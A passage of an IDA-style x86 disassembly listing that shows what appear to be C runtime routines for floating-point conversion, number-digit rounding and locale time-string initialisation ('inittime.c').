mov eax, [ebp+var_18]
or eax, edx
mov ecx, [ebp+var_20]
neg ecx
sbb ecx, ecx
and ecx, 80000000h
or eax, ecx
mov [ebp+var_24], eax
mov edx, [ebp+arg_8]
cmp dword ptr [edx+10h], 40h
jnz short loc_42929A
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_24]
mov [eax+4], ecx
mov edx, [ebp+arg_4]
mov eax, [ebp+var_14]
mov [edx], eax
jmp short loc_4292AB
; ---------------------------------------------------------------------------
loc_42929A: ; CODE XREF: sub_429070+215�j
mov ecx, [ebp+arg_8]
cmp dword ptr [ecx+10h], 20h
jnz short loc_4292AB
mov edx, [ebp+arg_4]
mov eax, [ebp+var_24]
mov [edx], eax
loc_4292AB: ; CODE XREF: sub_429070+228�j
; sub_429070+231�j
mov eax, [ebp+var_1C]
mov esp, ebp
pop ebp
retn
sub_429070 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4292C0 proc near ; CODE XREF: sub_4293C0+2A�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push offset dword_443720
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
push ecx
call sub_429070
add esp, 0Ch
pop ebp
retn
sub_4292C0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4292E0 proc near ; CODE XREF: sub_429440+2A�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push offset dword_443738
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
push ecx
call sub_429070
add esp, 0Ch
pop ebp
retn
sub_4292E0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_429300 proc near ; CODE XREF: .text:0042942A�p
; .text:0042D69F�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 18h
mov [ebp+var_14], 0
mov eax, [ebp+arg_0]
xor ecx, ecx
mov cx, [eax+0Ah]
and ecx, 7FFFh
mov word ptr [ebp+var_4], cx
mov edx, [ebp+arg_0]
xor eax, eax
mov ax, [edx+0Ah]
and eax, 8000h
mov word ptr [ebp+var_18], ax
mov ecx, [ebp+arg_0]
mov edx, [ecx+6]
mov [ebp+var_10], edx
mov eax, [ebp+arg_0]
mov ecx, [eax+2]
mov [ebp+var_C], ecx
mov edx, [ebp+arg_0]
xor eax, eax
mov ax, [edx]
shl eax, 10h
mov [ebp+var_8], eax
push 40h
lea ecx, [ebp+var_10]
push ecx
call sub_428DE0
add esp, 8
test eax, eax
jz short loc_429377
mov [ebp+var_10], 80000000h
mov dx, word ptr [ebp+var_4]
add dx, 1
mov word ptr [ebp+var_4], dx
loc_429377: ; CODE XREF: sub_429300+62�j
mov eax, [ebp+var_4]
and eax, 0FFFFh
cmp eax, 7FFFh
jnz short loc_42938D
mov [ebp+var_14], 1
loc_42938D: ; CODE XREF: sub_429300+84�j
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_10]
mov [ecx+4], edx
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_C]
mov [eax], ecx
mov edx, [ebp+var_18]
and edx, 0FFFFh
mov eax, [ebp+var_4]
and eax, 0FFFFh
or edx, eax
mov ecx, [ebp+arg_4]
mov [ecx+8], dx
mov eax, [ebp+var_14]
mov esp, ebp
pop ebp
retn
sub_429300 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4293C0 proc near ; CODE XREF: sub_422910+14�p
var_10 = byte ptr -10h
var_C = byte ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push 0
push 0
push 0
push 0
mov eax, [ebp+arg_4]
push eax
lea ecx, [ebp+var_10]
push ecx
lea edx, [ebp+var_C]
push edx
call sub_42CB40
add esp, 1Ch
mov eax, [ebp+arg_0]
push eax
lea ecx, [ebp+var_C]
push ecx
call sub_4292C0
add esp, 8
mov esp, ebp
pop ebp
retn
sub_4293C0 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
sub esp, 10h
push 0
push 0
push 0
push 1
mov eax, [ebp+0Ch]
push eax
lea ecx, [ebp-10h]
push ecx
lea edx, [ebp-0Ch]
push edx
call sub_42CB40
add esp, 1Ch
mov eax, [ebp+8]
push eax
lea ecx, [ebp-0Ch]
push ecx
call sub_429300
add esp, 8
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_429440 proc near ; CODE XREF: sub_422910+34�p
var_10 = byte ptr -10h
var_C = byte ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push 0
push 0
push 0
push 0
mov eax, [ebp+arg_4]
push eax
lea ecx, [ebp+var_10]
push ecx
lea edx, [ebp+var_C]
push edx
call sub_42CB40
add esp, 1Ch
mov eax, [ebp+arg_0]
push eax
lea ecx, [ebp+var_C]
push ecx
call sub_4292E0
add esp, 8
mov esp, ebp
pop ebp
retn
sub_429440 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_429480 proc near ; CODE XREF: sub_422960+4D�p
; sub_422B50+45�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, [ebp+arg_0]
mov [ebp+var_4], eax
mov ecx, [ebp+arg_8]
mov edx, [ecx+0Ch]
mov [ebp+var_8], edx
mov eax, [ebp+var_4]
mov byte ptr [eax], 30h
mov ecx, [ebp+var_4]
add ecx, 1
mov [ebp+var_4], ecx
loc_4294A4: ; CODE XREF: sub_429480+69�j
cmp [ebp+arg_4], 0
jle short loc_4294EB
mov edx, [ebp+var_8]
movsx eax, byte ptr [edx]
test eax, eax
jz short loc_4294C8
mov ecx, [ebp+var_8]
movsx edx, byte ptr [ecx]
mov [ebp+var_C], edx
mov eax, [ebp+var_8]
add eax, 1
mov [ebp+var_8], eax
jmp short loc_4294CF
; ---------------------------------------------------------------------------
loc_4294C8: ; CODE XREF: sub_429480+32�j
mov [ebp+var_C], 30h
loc_4294CF: ; CODE XREF: sub_429480+46�j
mov ecx, [ebp+var_4]
mov dl, byte ptr [ebp+var_C]
mov [ecx], dl
mov eax, [ebp+var_4]
add eax, 1
mov [ebp+var_4], eax
mov ecx, [ebp+arg_4]
sub ecx, 1
mov [ebp+arg_4], ecx
jmp short loc_4294A4
; ---------------------------------------------------------------------------
loc_4294EB: ; CODE XREF: sub_429480+28�j
mov edx, [ebp+var_4]
mov byte ptr [edx], 0
cmp [ebp+arg_4], 0
jl short loc_429534
mov eax, [ebp+var_8]
movsx ecx, byte ptr [eax]
cmp ecx, 35h
jl short loc_429534
mov edx, [ebp+var_4]
sub edx, 1
mov [ebp+var_4], edx
loc_42950B: ; CODE XREF: sub_429480+A5�j
mov eax, [ebp+var_4]
movsx ecx, byte ptr [eax]
cmp ecx, 39h
jnz short loc_429527
mov edx, [ebp+var_4]
mov byte ptr [edx], 30h
mov eax, [ebp+var_4]
sub eax, 1
mov [ebp+var_4], eax
jmp short loc_42950B
; ---------------------------------------------------------------------------
loc_429527: ; CODE XREF: sub_429480+94�j
mov ecx, [ebp+var_4]
mov dl, [ecx]
add dl, 1
mov eax, [ebp+var_4]
mov [eax], dl
loc_429534: ; CODE XREF: sub_429480+75�j
; sub_429480+80�j
mov ecx, [ebp+arg_0]
movsx edx, byte ptr [ecx]
cmp edx, 31h
jnz short loc_429550
mov eax, [ebp+arg_8]
mov ecx, [eax+4]
add ecx, 1
mov edx, [ebp+arg_8]
mov [edx+4], ecx
jmp short loc_429576
; ---------------------------------------------------------------------------
loc_429550: ; CODE XREF: sub_429480+BD�j
mov eax, [ebp+arg_0]
add eax, 1
push eax
call sub_418E70
add esp, 4
add eax, 1
push eax
mov ecx, [ebp+arg_0]
add ecx, 1
push ecx
mov edx, [ebp+arg_0]
push edx
call sub_426C00
add esp, 0Ch
loc_429576: ; CODE XREF: sub_429480+CE�j
mov esp, ebp
pop ebp
retn
sub_429480 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_429580 proc near ; CODE XREF: sub_422960+1E�p
; sub_422B50+1E�p ...
var_28 = word ptr -28h
var_26 = byte ptr -26h
var_24 = byte ptr -24h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = word ptr -4
arg_0 = byte ptr 8
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 28h
lea eax, [ebp+arg_0]
push eax
lea ecx, [ebp+var_C]
push ecx
call sub_429600
add esp, 8
lea edx, [ebp+var_28]
push edx
push 0
push 11h
sub esp, 0Ch
mov eax, esp
mov ecx, [ebp+var_C]
mov [eax], ecx
mov edx, [ebp+var_8]
mov [eax+4], edx
mov cx, [ebp+var_4]
mov [eax+8], cx
call sub_42D6C0
add esp, 18h
mov edx, [ebp+arg_8]
mov [edx+8], eax
movsx eax, [ebp+var_26]
mov ecx, [ebp+arg_8]
mov [ecx], eax
movsx edx, [ebp+var_28]
mov eax, [ebp+arg_8]
mov [eax+4], edx
lea ecx, [ebp+var_24]
push ecx
mov edx, [ebp+arg_C]
push edx
call sub_419FA0
add esp, 8
mov eax, [ebp+arg_8]
mov ecx, [ebp+arg_C]
mov [eax+0Ch], ecx
mov eax, [ebp+arg_8]
mov esp, ebp
pop ebp
retn
sub_429580 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_429600 proc near ; CODE XREF: sub_429580+E�p
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 1Ch
mov [ebp+var_C], 80000000h
mov word ptr [ebp+var_4], 0
mov eax, [ebp+arg_4]
xor ecx, ecx
mov cx, [eax+6]
and ecx, 7FF0h
sar ecx, 4
mov word ptr [ebp+var_14], cx
mov edx, [ebp+arg_4]
xor eax, eax
mov ax, [edx+6]
and eax, 8000h
mov word ptr [ebp+var_18], ax
mov ecx, [ebp+arg_4]
mov edx, [ecx+4]
and edx, 0FFFFFh
mov [ebp+var_8], edx
mov eax, [ebp+arg_4]
mov ecx, [eax]
mov [ebp+var_10], ecx
mov edx, [ebp+var_14]
and edx, 0FFFFh
mov [ebp+var_1C], edx
cmp [ebp+var_1C], 0
jz short loc_429677
cmp [ebp+var_1C], 7FFh
jz short loc_42966F
jmp short loc_4296BA
; ---------------------------------------------------------------------------
loc_42966F: ; CODE XREF: sub_429600+6B�j
mov word ptr [ebp+var_4], 7FFFh
jmp short loc_4296D5
; ---------------------------------------------------------------------------
loc_429677: ; CODE XREF: sub_429600+62�j
cmp [ebp+var_8], 0
jnz short loc_4296A4
cmp [ebp+var_10], 0
jnz short loc_4296A4
mov eax, [ebp+arg_0]
mov dword ptr [eax+4], 0
mov ecx, [ebp+arg_0]
mov dword ptr [ecx], 0
mov edx, [ebp+arg_0]
mov word ptr [edx+8], 0
jmp loc_42975E
; ---------------------------------------------------------------------------
loc_4296A4: ; CODE XREF: sub_429600+7B�j
; sub_429600+81�j
movsx eax, word ptr [ebp+var_14]
add eax, 3C01h
mov word ptr [ebp+var_4], ax
mov [ebp+var_C], 0
jmp short loc_4296D5
; ---------------------------------------------------------------------------
loc_4296BA: ; CODE XREF: sub_429600+6D�j
mov cx, word ptr [ebp+var_14]
sub cx, 3FFh
mov word ptr [ebp+var_14], cx
movsx edx, word ptr [ebp+var_14]
add edx, 3FFFh
mov word ptr [ebp+var_4], dx
loc_4296D5: ; CODE XREF: sub_429600+75�j
; sub_429600+B8�j
mov eax, [ebp+var_8]
shl eax, 0Bh
mov ecx, [ebp+var_C]
or ecx, eax
mov edx, [ebp+var_10]
shr edx, 15h
or ecx, edx
mov eax, [ebp+arg_0]
mov [eax+4], ecx
mov ecx, [ebp+var_10]
shl ecx, 0Bh
mov edx, [ebp+arg_0]
mov [edx], ecx
loc_4296F9: ; CODE XREF: sub_429600+142�j
mov eax, [ebp+arg_0]
mov ecx, [eax+4]
and ecx, 80000000h
test ecx, ecx
jnz short loc_429744
mov edx, [ebp+arg_0]
mov eax, [edx+4]
shl eax, 1
mov ecx, [ebp+arg_0]
mov edx, [ecx]
and edx, 80000000h
neg edx
sbb edx, edx
neg edx
or eax, edx
mov ecx, [ebp+arg_0]
mov [ecx+4], eax
mov edx, [ebp+arg_0]
mov eax, [edx]
shl eax, 1
mov ecx, [ebp+arg_0]
mov [ecx], eax
mov dx, word ptr [ebp+var_4]
sub dx, 1
mov word ptr [ebp+var_4], dx
jmp short loc_4296F9
; ---------------------------------------------------------------------------
loc_429744: ; CODE XREF: sub_429600+107�j
mov eax, [ebp+var_18]
and eax, 0FFFFh
mov ecx, [ebp+var_4]
and ecx, 0FFFFh
or eax, ecx
mov edx, [ebp+arg_0]
mov [edx+8], ax
loc_42975E: ; CODE XREF: sub_429600+9F�j
mov esp, ebp
pop ebp
retn
sub_429600 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push 2
call sub_41BAE0
add esp, 4
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_429780 proc near ; DATA XREF: .data:004434D4�o
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
cmp dword_49217C, 0
jz loc_429821
push 48h
push offset aInittime_c ; "inittime.c"
push 2
push 0ACh
push 1
call sub_416E40
add esp, 14h
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_4297BC
mov eax, 1
jmp loc_429857
; ---------------------------------------------------------------------------
loc_4297BC: ; CODE XREF: sub_429780+30�j
mov eax, [ebp+var_4]
push eax
call sub_429860
add esp, 4
test eax, eax
jz short loc_4297ED
mov ecx, [ebp+var_4]
push ecx
call sub_429DF0
add esp, 4
push 2
mov edx, [ebp+var_4]
push edx
call sub_4174C0
add esp, 8
mov eax, 1
jmp short loc_429857
; ---------------------------------------------------------------------------
loc_4297ED: ; CODE XREF: sub_429780+4A�j
mov eax, [ebp+var_4]
mov off_443FE4, eax
mov ecx, dword_4922C8
push ecx
call sub_429DF0
add esp, 4
push 2
mov edx, dword_4922C8
push edx
call sub_4174C0
add esp, 8
mov eax, [ebp+var_4]
mov dword_4922C8, eax
xor eax, eax
jmp short loc_429857
; ---------------------------------------------------------------------------
loc_429821: ; CODE XREF: sub_429780+B�j
mov off_443FE4, offset off_443FE8
mov ecx, dword_4922C8
push ecx
call sub_429DF0
add esp, 4
push 2
mov edx, dword_4922C8
push edx
call sub_4174C0
add esp, 8
mov dword_4922C8, 0
xor eax, eax
loc_429857: ; CODE XREF: sub_429780+37�j
; sub_429780+6B�j ...
mov esp, ebp
pop ebp
retn
sub_429780 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_429860 proc near ; CODE XREF: sub_429780+40�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
mov [ebp+var_C], 0
xor eax, eax
mov ax, word_492302
mov [ebp+var_4], eax
xor ecx, ecx
mov cx, word_492304
mov [ebp+var_8], ecx
cmp [ebp+arg_0], 0
jnz short loc_429892
or eax, 0FFFFFFFFh
jmp loc_429DEB
; ---------------------------------------------------------------------------
loc_429892: ; CODE XREF: sub_429860+28�j
mov edx, [ebp+arg_0]
add edx, 4
push edx
push 31h
mov eax, [ebp+var_4]
push eax
push 1
call sub_42F050
add esp, 10h
mov ecx, [ebp+var_C]
or ecx, eax
mov [ebp+var_C], ecx
mov edx, [ebp+arg_0]
add edx, 8
push edx
push 32h
mov eax, [ebp+var_4]
push eax
push 1
call sub_42F050
add esp, 10h
mov ecx, [ebp+var_C]
or ecx, eax
mov [ebp+var_C], ecx
mov edx, [ebp+arg_0]
add edx, 0Ch
push edx
push 33h
mov eax, [ebp+var_4]
push eax
push 1
call sub_42F050
add esp, 10h
mov ecx, [ebp+var_C]
or ecx, eax
mov [ebp+var_C], ecx
mov edx, [ebp+arg_0]
add edx, 10h
push edx
push 34h
mov eax, [ebp+var_4]
push eax
push 1
call sub_42F050
add esp, 10h
mov ecx, [ebp+var_C]
or ecx, eax
mov [ebp+var_C], ecx
mov edx, [ebp+arg_0]
add edx, 14h
push edx
push 35h
mov eax, [ebp+var_4]
push eax
push 1
call sub_42F050
add esp, 10h
mov ecx, [ebp+var_C]
or ecx, eax
mov [ebp+var_C], ecx
mov edx, [ebp+arg_0]
add edx, 18h
push edx
push 36h
mov eax, [ebp+var_4]
push eax
push 1
call sub_42F050
add esp, 10h
mov ecx, [ebp+var_C]
or ecx, eax
mov [ebp+var_C], ecx
mov edx, [ebp+arg_0]
push edx
push 37h
mov eax, [ebp+var_4]
push eax
push 1
call sub_42F050
add esp, 10h
mov ecx, [ebp+var_C]
or ecx, eax
mov [ebp+var_C], ecx
mov edx, [ebp+arg_0]
add edx, 20h
push edx
push 2Ah
mov eax, [ebp+var_4]
push eax
push 1
call sub_42F050
add esp, 10h
mov ecx, [ebp+var_C]
or ecx, eax
mov [ebp+var_C], ecx
mov edx, [ebp+arg_0]
add edx, 24h
push edx
push 2Bh
mov eax, [ebp+var_4]
push eax
push 1
call sub_42F050
add esp, 10h
mov ecx, [ebp+var_C]
or ecx, eax
mov [ebp+var_C], ecx
mov edx, [ebp+arg_0]
add edx, 28h
push edx
push 2Ch
mov eax, [ebp+var_4]
push eax
push 1
call sub_42F050
add esp, 10h
mov ecx, [ebp+var_C]
or ecx, eax
mov [ebp+var_C], ecx
mov edx, [ebp+arg_0]
add edx, 2Ch
push edx
push 2Dh
mov eax, [ebp+var_4]
push eax
push 1
call sub_42F050
add esp, 10h
mov ecx, [ebp+var_C]
or ecx, eax
mov [ebp+var_C], ecx
mov edx, [ebp+arg_0]
add edx, 30h
push edx
push 2Eh
mov eax, [ebp+var_4]
push eax
push 1
call sub_42F050
add esp, 10h
mov ecx, [ebp+var_C]
or ecx, eax
mov [ebp+var_C], ecx
mov edx, [ebp+arg_0]
add edx, 34h
push edx
push 2Fh
mov eax, [ebp+var_4]
push eax
push 1
call sub_42F050
add esp, 10h
mov ecx, [ebp+var_C]
or ecx, eax
mov [ebp+var_C], ecx
mov edx, [ebp+arg_0]
add edx, 1Ch
push edx
push 30h
mov eax, [ebp+var_4]
push eax
push 1
call sub_42F050
add esp, 10h
mov ecx, [ebp+var_C]
or ecx, eax
mov [ebp+var_C], ecx
mov edx, [ebp+arg_0]
add edx, 38h
push edx
push 44h
mov eax, [ebp+var_4]
push eax
push 1
call sub_42F050
add esp, 10h
mov ecx, [ebp+var_C]
or ecx, eax
mov [ebp+var_C], ecx
mov edx, [ebp+arg_0]
add edx, 3Ch
push edx
push 45h
mov eax, [ebp+var_4]
push eax
push 1
call sub_42F050
add esp, 10h
mov ecx, [ebp+var_C]
or ecx, eax
mov [ebp+var_C], ecx
mov edx, [ebp+arg_0]
add edx, 40h
push edx
push 46h
mov eax, [ebp+var_4]
push eax
push 1
call sub_42F050
add esp, 10h
mov ecx, [ebp+var_C]
or ecx, eax
mov [ebp+var_C], ecx
mov edx, [ebp+arg_0]
add edx, 44h
push edx
push 47h
mov eax, [ebp+var_4]
push eax
push 1
call sub_42F050
add esp, 10h
mov ecx, [ebp+var_C]
or ecx, eax
mov [ebp+var_C], ecx
mov edx, [ebp+arg_0]
add edx, 48h
push edx
push 48h
mov eax, [ebp+var_4]
push eax
push 1
call sub_42F050
add esp, 10h
mov ecx, [ebp+var_C]
or ecx, eax
mov [ebp+var_C], ecx
mov edx, [ebp+arg_0]
add edx, 4Ch
push edx
push 49h
mov eax, [ebp+var_4]
push eax
push 1
call sub_42F050
add esp, 10h
mov ecx, [ebp+var_C]
or ecx, eax
mov [ebp+var_C], ecx
mov edx, [ebp+arg_0]
add edx, 50h
push edx
push 4Ah
mov eax, [ebp+var_4]
push eax
push 1
call sub_42F050
add esp, 10h
mov ecx, [ebp+var_C]
or ecx, eax
mov [ebp+var_C], ecx
mov edx, [ebp+arg_0]
add edx, 54h
push edx
push 4Bh
mov eax, [ebp+var_4]
push eax
push 1
call sub_42F050
add esp, 10h
mov ecx, [ebp+var_C]
or ecx, eax
mov [ebp+var_C], ecx
mov edx, [ebp+arg_0]
add edx, 58h
push edx
push 4Ch
mov eax, [ebp+var_4]
push eax
push 1
call sub_42F050
add esp, 10h
mov ecx, [ebp+var_C]
or ecx, eax
mov [ebp+var_C], ecx
mov edx, [ebp+arg_0]
add edx, 5Ch
push edx
push 4Dh
mov eax, [ebp+var_4]
push eax
push 1
call sub_42F050
add esp, 10h
mov ecx, [ebp+var_C]
or ecx, eax
mov [ebp+var_C], ecx
mov edx, [ebp+arg_0]
add edx, 60h
push edx
push 4Eh
mov eax, [ebp+var_4]
push eax
push 1
call sub_42F050
add esp, 10h
mov ecx, [ebp+var_C]
or ecx, eax
mov [ebp+var_C], ecx
mov edx, [ebp+arg_0]
add edx, 64h
push edx
push 4Fh
mov eax, [ebp+var_4]
push eax
push 1
call sub_42F050
add esp, 10h
mov ecx, [ebp+var_C]
or ecx, eax
mov [ebp+var_C], ecx
mov edx, [ebp+arg_0]
add edx, 68h
push edx
push 38h
mov eax, [ebp+var_4]
push eax
push 1
call sub_42F050
add esp, 10h
mov ecx, [ebp+var_C]
or ecx, eax
mov [ebp+var_C], ecx
mov edx, [ebp+arg_0]
add edx, 6Ch
push edx
push 39h
mov eax, [ebp+var_4]
push eax
push 1
call sub_42F050
add esp, 10h
mov ecx, [ebp+var_C]
or ecx, eax
mov [ebp+var_C], ecx
mov edx, [ebp+arg_0]
add edx, 70h
push edx
push 3Ah
mov eax, [ebp+var_4]
push eax
push 1
call sub_42F050
add esp, 10h
mov ecx, [ebp+var_C]
or ecx, eax
mov [ebp+var_C], ecx
mov edx, [ebp+arg_0]
add edx, 74h
push edx
push 3Bh
mov eax, [ebp+var_4]
push eax
push 1
call sub_42F050
add esp, 10h
mov ecx, [ebp+var_C]
or ecx, eax
mov [ebp+var_C], ecx
mov edx, [ebp+arg_0]
add edx, 78h
push edx
push 3Ch
mov eax, [ebp+var_4]
push eax
push 1
call sub_42F050
add esp, 10h
mov ecx, [ebp+var_C]
or ecx, eax
mov [ebp+var_C], ecx
mov edx, [ebp+arg_0]
add edx, 7Ch
push edx
push 3Dh
mov eax, [ebp+var_4]
push eax
push 1
call sub_42F050
add esp, 10h
mov ecx, [ebp+var_C]
or ecx, eax
mov [ebp+var_C], ecx
mov edx, [ebp+arg_0]
add edx, 80h
push edx
push 3Eh
mov eax, [ebp+var_4]
push eax
push 1
call sub_42F050
add esp, 10h
mov ecx, [ebp+var_C]
or ecx, eax
mov [ebp+var_C], ecx
mov edx, [ebp+arg_0]
add edx, 84h
push edx
push 3Fh
mov eax, [ebp+var_4]
push eax
push 1
call sub_42F050
add esp, 10h
mov ecx, [ebp+var_C]
or ecx, eax
mov [ebp+var_C], ecx
mov edx, [ebp+arg_0]
add edx, 88h
push edx
push 40h
mov eax, [ebp+var_4]
push eax
push 1
call sub_42F050
add esp, 10h
mov ecx, [ebp+var_C]
or ecx, eax
mov [ebp+var_C], ecx
mov edx, [ebp+arg_0]
add edx, 8Ch
push edx
push 41h
mov eax, [ebp+var_4]
push eax
push 1
call sub_42F050
add esp, 10h
mov ecx, [ebp+var_C]
or ecx, eax
mov [ebp+var_C], ecx
mov edx, [ebp+arg_0]
add edx, 90h
push edx
push 42h
mov eax, [ebp+var_4]
push eax
push 1
call sub_42F050
add esp, 10h
mov ecx, [ebp+var_C]
or ecx, eax
mov [ebp+var_C], ecx
mov edx, [ebp+arg_0]
add edx, 94h
push edx
push 43h
mov eax, [ebp+var_4]
push eax
push 1
call sub_42F050
add esp, 10h
mov ecx, [ebp+var_C]
or ecx, eax
mov [ebp+var_C], ecx
mov edx, [ebp+arg_0]
add edx, 98h
push edx
push 28h
mov eax, [ebp+var_4]
push eax
push 1
call sub_42F050
add esp, 10h
mov ecx, [ebp+var_C]
or ecx, eax
mov [ebp+var_C], ecx
mov edx, [ebp+arg_0]
add edx, 9Ch
push edx
push 29h
mov eax, [ebp+var_4]
push eax
push 1
call sub_42F050
add esp, 10h
mov ecx, [ebp+var_C]
or ecx, eax
mov [ebp+var_C], ecx
mov edx, [ebp+arg_0]
add edx, 0A0h
push edx
push 1Fh
mov eax, [ebp+var_8]
push eax
push 1
call sub_42F050
add esp, 10h
mov ecx, [ebp+var_C]
or ecx, eax
mov [ebp+var_C], ecx
mov edx, [ebp+arg_0]
add edx, 0A4h
push edx
push 20h
mov eax, [ebp+var_8]
push eax
push 1
call sub_42F050
add esp, 10h
mov ecx, [ebp+var_C]
or ecx, eax
mov [ebp+var_C], ecx
mov edx, [ebp+arg_0]
add edx, 0A8h
push edx
push 1003h
mov eax, [ebp+var_8]
push eax
push 1
call sub_42F050
add esp, 10h
mov ecx, [ebp+var_C]
or ecx, eax
mov [ebp+var_C], ecx
mov eax, [ebp+var_C]
loc_429DEB: ; CODE XREF: sub_429860+2D�j
mov esp, ebp
pop ebp
retn
sub_429860 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_429DF0 proc near ; CODE XREF: sub_429780+50�p
; sub_429780+7C�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
cmp [ebp+arg_0], 0
jnz short loc_429DFE
jmp loc_42A0F9
; ---------------------------------------------------------------------------
loc_429DFE: ; CODE XREF: sub_429DF0+7�j
push 2
mov eax, [ebp+arg_0]
mov ecx, [eax+4]
push ecx
call sub_4174C0
add esp, 8
push 2
mov edx, [ebp+arg_0]
mov eax, [edx+8]
push eax
call sub_4174C0
add esp, 8
push 2
mov ecx, [ebp+arg_0]
mov edx, [ecx+0Ch]
push edx
call sub_4174C0
add esp, 8
push 2
mov eax, [ebp+arg_0]
mov ecx, [eax+10h]
push ecx
call sub_4174C0
add esp, 8
push 2
mov edx, [ebp+arg_0]
mov eax, [edx+14h]
push eax
call sub_4174C0
add esp, 8
push 2
mov ecx, [ebp+arg_0]
mov edx, [ecx+18h]
push edx
call sub_4174C0
add esp, 8
push 2
mov eax, [ebp+arg_0]
mov ecx, [eax]
push ecx
call sub_4174C0
add esp, 8
push 2
mov edx, [ebp+arg_0]
mov eax, [edx+20h]
push eax
call sub_4174C0
add esp, 8
push 2
mov ecx, [ebp+arg_0]
mov edx, [ecx+24h]
push edx
call sub_4174C0
add esp, 8
push 2
mov eax, [ebp+arg_0]
mov ecx, [eax+28h]
push ecx
call sub_4174C0
add esp, 8
push 2
mov edx, [ebp+arg_0]
mov eax, [edx+2Ch]
push eax
call sub_4174C0
add esp, 8
push 2
mov ecx, [ebp+arg_0]
mov edx, [ecx+30h]
push edx
call sub_4174C0
add esp, 8
push 2
mov eax, [ebp+arg_0]
mov ecx, [eax+34h]
push ecx
call sub_4174C0
add esp, 8
push 2
mov edx, [ebp+arg_0]
mov eax, [edx+1Ch]
push eax
call sub_4174C0
add esp, 8
push 2
mov ecx, [ebp+arg_0]
mov edx, [ecx+38h]
push edx
call sub_4174C0
add esp, 8
push 2
mov eax, [ebp+arg_0]
mov ecx, [eax+3Ch]
push ecx
call sub_4174C0
add esp, 8
push 2
mov edx, [ebp+arg_0]
mov eax, [edx+40h]
push eax
call sub_4174C0
add esp, 8
push 2
mov ecx, [ebp+arg_0]
mov edx, [ecx+44h]
push edx
call sub_4174C0
add esp, 8
push 2
mov eax, [ebp+arg_0]
mov ecx, [eax+48h]
push ecx
call sub_4174C0
add esp, 8
push 2
mov edx, [ebp+arg_0]
mov eax, [edx+4Ch]
push eax
call sub_4174C0
add esp, 8
push 2
mov ecx, [ebp+arg_0]
mov edx, [ecx+50h]
push edx
call sub_4174C0
add esp, 8
push 2
mov eax, [ebp+arg_0]
mov ecx, [eax+54h]
push ecx
call sub_4174C0
add esp, 8
push 2
mov edx, [ebp+arg_0]
mov eax, [edx+58h]
push eax
call sub_4174C0
add esp, 8
push 2
mov ecx, [ebp+arg_0]
mov edx, [ecx+5Ch]
push edx
call sub_4174C0
add esp, 8
push 2
mov eax, [ebp+arg_0]
mov ecx, [eax+60h]
push ecx
call sub_4174C0
add esp, 8
push 2
mov edx, [ebp+arg_0]
mov eax, [edx+64h]
push eax
call sub_4174C0
add esp, 8
push 2
mov ecx, [ebp+arg_0]
mov edx, [ecx+68h]
push edx
call sub_4174C0
add esp, 8
push 2
mov eax, [ebp+arg_0]
mov ecx, [eax+6Ch]
push ecx
call sub_4174C0
add esp, 8
push 2
mov edx, [ebp+arg_0]
mov eax, [edx+70h]
push eax
call sub_4174C0
add esp, 8
push 2
mov ecx, [ebp+arg_0]
mov edx, [ecx+74h]
push edx
call sub_4174C0
add esp, 8
push 2
mov eax, [ebp+arg_0]
mov ecx, [eax+78h]
push ecx
call sub_4174C0
add esp, 8
push 2
